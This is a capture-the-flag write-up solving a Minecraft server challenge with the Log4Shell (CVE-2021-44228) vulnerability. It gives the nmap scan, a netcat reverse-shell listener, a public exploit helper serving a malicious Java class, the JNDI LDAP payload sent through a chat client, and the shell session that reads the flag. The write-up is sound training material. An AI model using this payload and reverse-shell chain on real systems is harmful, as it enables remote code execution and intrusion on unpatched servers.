Minecraft (Smart Home, 300p)

You have been hosting a Minecraft server for your friends for a long time.
All has been running smoothly and you have learned a lot in the process. Friends are happy as well :)
One day suddenly you read news about all kinds of vulnerabilities and how everything is insecure.
You start to wonder if your server is also affected.
Find the vulnerability from your system.
When you have found it, get the flag from /flag.

Minecraft server:
Hostname: envXXX.target02
Port: 25565
Server is running in offline mode.

solution

Scanning port 25565 with nmap, reveals it is trully running a Minecraft server. 

# nmap -sV -p 25565 envXXX.target02
Nmap scan report for envXXX.target02 (10.92.XX.Y)
Host is up (0.0026s latency).

PORT      STATE SERVICE   VERSION
25565/tcp open  minecraft Minecraft 1.16.2 (Protocol: 127, Message: Welcome to 2cCTF Techr Minecraft server. Stay safe!, Users: 0/20)

The only known exploit for Minecraft is famous Log4Shell (CVE-2021-44228) vulnerability. It is pretty straight-forward to exploit.

Start reverse-shell listener. 

# nc -lvnp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001

Download a public Log4j exploit helper, to start LDAP and web server, which will deploy the exploit. 

# git clone --depth=1 https://github.com/cybersecurityworks553/log4j-shell-csw
Cloning into 'log4j-shell-csw'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 11 (delta 0), reused 2 (delta 0), pack-reused 0
Receiving objects: 100% (11/11), 36.87 MiB | 5.62 MiB/s, done.
# cd log4j-shell-cs 
# python3 CVE-2021-44228-exploit.py --userip 10.85.XX.Y --webport 8888

[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html

[+] Exploit java class created success
[+] Setting up LDAP server


[+] Send me: ${jndi:ldap://10.85.XX.Y:1389/a}

[+] Starting Webserver on port 8888 http://0.0.0.0:8888
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.85.XX.Y:8888/Exploit.class

To trigger the exploit, a Minecraft client is necessary. Minecraft Console Client is a good choice.

Connect to target and trigger the exploit. 

# ./MinecraftClient "pwn" "-" envXXX.target02
Minecraft Console Client v1.19.2 - for MC 1.4.6 to 1.19.2 - Github.com/MCCTeam
Resolving envXXX.target02...
You chose to run in offline mode.
Retrieving Server Info...
Server version : 1.16.2 (protocol v751)
[MCC] Version is supported.
Logging in...
[MCC] Server is in offline mode.
[MCC] Server was successfully joined.
Type '/quit' to leave the server.
> ${jndi:ldap://10.85.XX.Y:1389/a}

Exploit helper receives connection and deploys Exploit.class. 

10.92.XX.Y - - [0X/Oct/2022 AA:BB:CC] "GET /Exploit.class HTTP/1.1" 200 -

Reverse shell received. Retrieve the flag. 

Ncat: Connection from 10.92.XX.Y.
Ncat: Connection from 10.92.XX.Y:39002.
id
uid=1000(minecraft) gid=1000(minecraft) groups=1000(minecraft)
cd /flag
ls -al
total 12
drwxr-xr-x 2 root root 4096 Oct  3 15:49 .
drwxr-xr-x 1 root root 4096 Sep 21 10:17 ..
-rw-r--r-- 1 root root   25 Oct  3 15:49 ender-dragon.txt
cat ender-dragon.txt
ctftech{creeper-creeper}

Flag is ctftech{creeper-creeper}.

Buy Me A Coffee